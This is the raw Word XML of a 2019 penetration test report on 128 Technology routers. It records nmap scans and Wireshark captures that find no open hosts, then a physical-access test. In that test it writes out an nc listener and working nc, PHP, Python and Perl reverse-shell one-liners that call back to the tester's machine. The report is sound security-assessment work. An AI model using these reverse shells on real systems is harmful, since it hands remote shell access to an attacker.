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3C4" w:rsidRDefault="00A063C4" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000507F3" w:rsidRDefault="00A063C4" w:rsidP="00A063C4">
      <w:pPr>
        <w:pStyle w:val="Title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E25045B" wp14:editId="2D24E4C3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-340360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>-635000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1302385" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="Picture 4" descr="/Users/timchabail/Desktop/thumbnail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timchabail/Desktop/thumbnail_image0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t>128 Technology</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testing </w:t>
      </w:r>
      <w:r w:rsidR="00BB76F5">
        <w:t>Report</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="00315FD5" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Black Box</w:t>
      </w:r>
      <w:r w:rsidR="005677C5">
        <w:t xml:space="preserve"> – Day 1 of Testing</w:t>
      </w:r>
      <w:r w:rsidR="00531B6A">
        <w:t>: 12 July 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="00A063C4" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00315FD5">
        <w:t>onnected to each router via ethernet cable. Both issued the following IP address via DHCP: 169.254.143.217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="00315FD5" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Neither router revealed a default gateway</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303A3E" w:rsidRDefault="00303A3E" w:rsidP="00303A3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4694327" cy="1097375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ynamically Allocated IPv4 addres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4327" cy="109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5FD5" w:rsidRDefault="00315FD5" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wireshark was then used to determine what kind of traffic could be seen on the network and potentially reveal any hosts.</w:t>
      </w:r>
      <w:r w:rsidR="003A0359">
        <w:t xml:space="preserve"> Packets were captured for approximately 30 minutes from each router while being issued the 169.254.143.217 via DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="00315FD5" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No hosts were revealed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="003A0359" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No HTTP traffic or similarly interesting traffic was identified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="00315FD5" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap was used to </w:t>
      </w:r>
      <w:r w:rsidR="005677C5">
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 169.254.143.1/16</w:t>
      </w:r>
      <w:r w:rsidR="005677C5">
        <w:t xml:space="preserve"> for hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00303A3E" w:rsidRDefault="00303A3E" w:rsidP="00303A3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Using the no port scan flag “-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” tester</w:t>
      </w:r>
      <w:r w:rsidR="005677C5">
        <w:t>s scanned for hosts responding to the discovery probes on the 255.255.0.0 subnet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7910"/>
      </w:tblGrid>
      <w:tr w:rsidR="00303A3E" w:rsidTr="005677C5">
        <w:trPr>
          <w:trHeight w:val="64"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00303A3E" w:rsidRDefault="005677C5" w:rsidP="00303A3E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 169.254.143.1/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="005677C5" w:rsidP="005677C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No hosts were discovered as being “up”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005677C5" w:rsidRDefault="005677C5" w:rsidP="005677C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testers ran the following port scan </w:t>
      </w:r>
      <w:r w:rsidR="00531B6A">
        <w:t>incase the discovery probes were being blocked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7910"/>
      </w:tblGrid>
      <w:tr w:rsidR="005677C5" w:rsidTr="005677C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005677C5" w:rsidRDefault="005677C5" w:rsidP="005677C5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p 21,22,</w:t>
            </w:r>
            <w:r w:rsidR="00531B6A">
              <w:t>80,443,8080 169.254.143.1/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00531B6A" w:rsidRDefault="00531B6A" w:rsidP="00531B6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>All ports were filtered or closed. No hosts determined to be “up”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00531B6A" w:rsidRDefault="00531B6A" w:rsidP="00531B6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testers began to scan </w:t>
      </w:r>
      <w:r w:rsidR="00956864">
        <w:t xml:space="preserve">common IP ranges with discovery probes using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00956864">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.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7910"/>
      </w:tblGrid>
      <w:tr w:rsidR="00956864" w:rsidTr="00956864">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00956864" w:rsidRDefault="00956864" w:rsidP="00956864">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 10.0.0.1/16</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00956864" w:rsidRDefault="00956864" w:rsidP="00956864">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.1.1/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00956864" w:rsidRDefault="00956864" w:rsidP="00956864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No hosts were discovered as being “up”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956864" w:rsidRDefault="00956864" w:rsidP="00956864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Testers port scanned common ports on the same common IP ranges.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7910"/>
      </w:tblGrid>
      <w:tr w:rsidR="00956864" w:rsidTr="00956864">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00956864" w:rsidRDefault="00956864" w:rsidP="00956864">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p 21,22,80,443,8080 10.0.0.1/16</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00956864" w:rsidRDefault="00956864" w:rsidP="00956864">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p 21,22,80,443,8080 192.168.1.1/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00956864" w:rsidRDefault="00956864" w:rsidP="00956864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No hosts were discovered as “up”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116C98" w:rsidRDefault="00315FD5" w:rsidP="00315FD5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Having no default gateway provided via DHCP, and no hosts discovered through </w:t>
      </w:r>
      <w:r w:rsidR="003A0359">
        <w:t xml:space="preserve">discovery probes, </w:t>
      </w:r>
      <w:r>
        <w:t>port scans</w:t>
      </w:r>
      <w:r w:rsidR="003A0359">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or packet analysis</w:t>
      </w:r>
      <w:r w:rsidR="00116C98">
        <w:t>, testers proceeded to the Gray Box portion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="00116C98" w:rsidP="00116C98">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Gr</w:t>
      </w:r>
      <w:r w:rsidR="00A063C4">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>y Box</w:t>
      </w:r>
      <w:r w:rsidR="00315FD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00531B6A">
        <w:t>– Day 2 of Testing: 13 July 201</w:t>
      </w:r>
      <w:r w:rsidR="003A0359">
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116C98" w:rsidRDefault="00E942F6" w:rsidP="00116C98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Testers</w:t>
      </w:r>
      <w:r w:rsidR="00116C98">
        <w:t xml:space="preserve"> were provided with a network diagram depicting the entire </w:t>
      </w:r>
      <w:r w:rsidR="00DE4F1B">
        <w:t xml:space="preserve">network </w:t>
      </w:r>
      <w:r w:rsidR="00116C98">
        <w:t>landscape</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116C98" w:rsidRDefault="00116C98" w:rsidP="00116C98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On each router, </w:t>
      </w:r>
      <w:r w:rsidR="003A0359">
        <w:t>testers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connected via ethernet cable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00116C98" w:rsidRDefault="008E3206" w:rsidP="00116C98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Every IP provided in the network diagram was scanned for open ports using both Nmap and Core Impact</w:t>
      </w:r>
      <w:r w:rsidR="003A0359">
        <w:t xml:space="preserve"> from the perspective of each router (plugged in via ethernet to each one separately)</w:t>
      </w:r>
      <w:r>
        <w:t>. All ports were either filtered or closed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956864" w:rsidRPr="00116C98" w:rsidRDefault="00956864" w:rsidP="00956864">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Core Impact results for one of the systems depicted in the network diagram which mimicked</w:t>
      </w:r>
      <w:r w:rsidR="003A0359">
        <w:t xml:space="preserve"> the results of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all Core Impact Scans for IPs provided in the network diagram</w:t>
      </w:r>
      <w:r w:rsidR="00590FC3">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="008E3206">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4351397" cy="4648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reImpact-Attack_Router1--Perspective_Router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1397" cy="46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5715" w:rsidRDefault="00C45715" w:rsidP="00C45715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After Core Impact failed to return any open ports or avenues of attack, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was leveraged to scan all 65,535 ports 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7910"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A0359" w:rsidTr="003A0359">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003A0359" w:rsidRDefault="003A0359" w:rsidP="003A0359">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -p 1-65535 -T4 -A </w:t>
            </w:r>
            <w:r w:rsidR="002B79F0">
              <w:t>10.0.1.1,1.1.1.2,1.1.1.1,192.168.1.2,192.168.1.1,192.168.2.1,192.168.2.2,10.0.2.1,10.0.2.2,10.0.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00776EDE" w:rsidRDefault="002B79F0" w:rsidP="00C45715">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>These scans were r</w:t>
      </w:r>
      <w:r w:rsidR="00F22136">
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="00F22136">
        <w:t>different</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IPv4</w:t>
      </w:r>
      <w:r w:rsidR="00F22136">
        <w:t xml:space="preserve"> settings</w:t>
      </w:r>
      <w:r>
        <w:t>. Every perspective was covered from the dynamically provided IPv4 address of 169.254.143.217, Manually set static IP of 10.0.1.2, 10.0.2.2, 10.0.1.3, 10.0.</w:t>
      </w:r>
      <w:r w:rsidR="00776EDE">
        <w:t>2.3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B79F0" w:rsidRDefault="00776EDE" w:rsidP="00575769">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>All scans reported back that all ports were either filtered or closed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315FD5" w:rsidRDefault="00DE4F1B" w:rsidP="00DE4F1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wireshark was once again utilized to perform packet analysis. No interesting traffic was seen</w:t>
      </w:r>
      <w:r w:rsidR="00776EDE">
        <w:t xml:space="preserve"> from either of the router perspectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4F1B" w:rsidRDefault="00DE4F1B" w:rsidP="00DE4F1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Testers were unable to identify any hosts that were up, rendering any MITM options futile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4F1B" w:rsidRDefault="00DE4F1B" w:rsidP="00DE4F1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>With all ports reporting back as filtered or closed in all the scans run, and no hosts identified</w:t>
      </w:r>
      <w:r w:rsidR="00D36A1D">
        <w:t xml:space="preserve"> as being up</w:t>
      </w:r>
      <w:r>
        <w:t>, testers proceeded to carryout a physical access scenario attack attempting to reach out with a shell to the attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F22136" w:rsidRDefault="00F22136" w:rsidP="00F22136">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From the attacking kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> machine, the following command was issued to listen for a connection</w:t>
      </w:r>
      <w:r w:rsidR="00575769">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00575769">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>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270"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F22136" w:rsidTr="00F22136">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F22136" w:rsidRDefault="00F22136" w:rsidP="00F22136">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nlvp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F22136" w:rsidRDefault="00F22136" w:rsidP="00F22136">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>From each router with a keyboard and monitor connected, several attempts were made to reach out to the attacking machine to provide a shell using the following commands</w:t>
      </w:r>
      <w:r w:rsidR="00575769">
        <w:t xml:space="preserve"> (dynamically provided IP was used in these examples)</w:t>
      </w:r>
      <w:r>
        <w:t>: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270"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F22136" w:rsidTr="00F22136">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F22136" w:rsidRDefault="00F22136" w:rsidP="00F22136">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F22136">
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F22136">
              <w:t xml:space="preserve"> -e /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F22136">
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F22136">
              <w:t xml:space="preserve"> 169.254.143.217 1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F22136" w:rsidTr="00F22136">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F22136" w:rsidRPr="00F22136" w:rsidRDefault="00F22136" w:rsidP="00F22136">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00F22136">
              <w:t>php -r '$sock=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F22136">
              <w:t>fsockopen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F22136">
              <w:t>("169.254.143.217",1337);exec("/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F22136">
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F22136">
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F22136">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F22136">
              <w:t xml:space="preserve"> &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F22136" w:rsidTr="00F22136">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F22136" w:rsidRPr="00F22136" w:rsidRDefault="00575769" w:rsidP="00F22136">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00575769">
              <w:t>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("169.254.143.217",1337));os.dup2(s.fileno(),0); os.dup2(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>s.fileno</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t>(),1); os.dup2(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>s.fileno</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t>(),2);p=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>subprocess.call</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t>(["/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t>","-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t>"]);'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00575769" w:rsidTr="00F22136">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00575769" w:rsidRPr="00575769" w:rsidRDefault="00575769" w:rsidP="00F22136">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>perl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t xml:space="preserve"> -e 'use Socket;$i="169.254.143.217";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t>");};'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00575769" w:rsidTr="00F22136">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00575769" w:rsidRPr="00575769" w:rsidRDefault="00575769" w:rsidP="00F22136">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
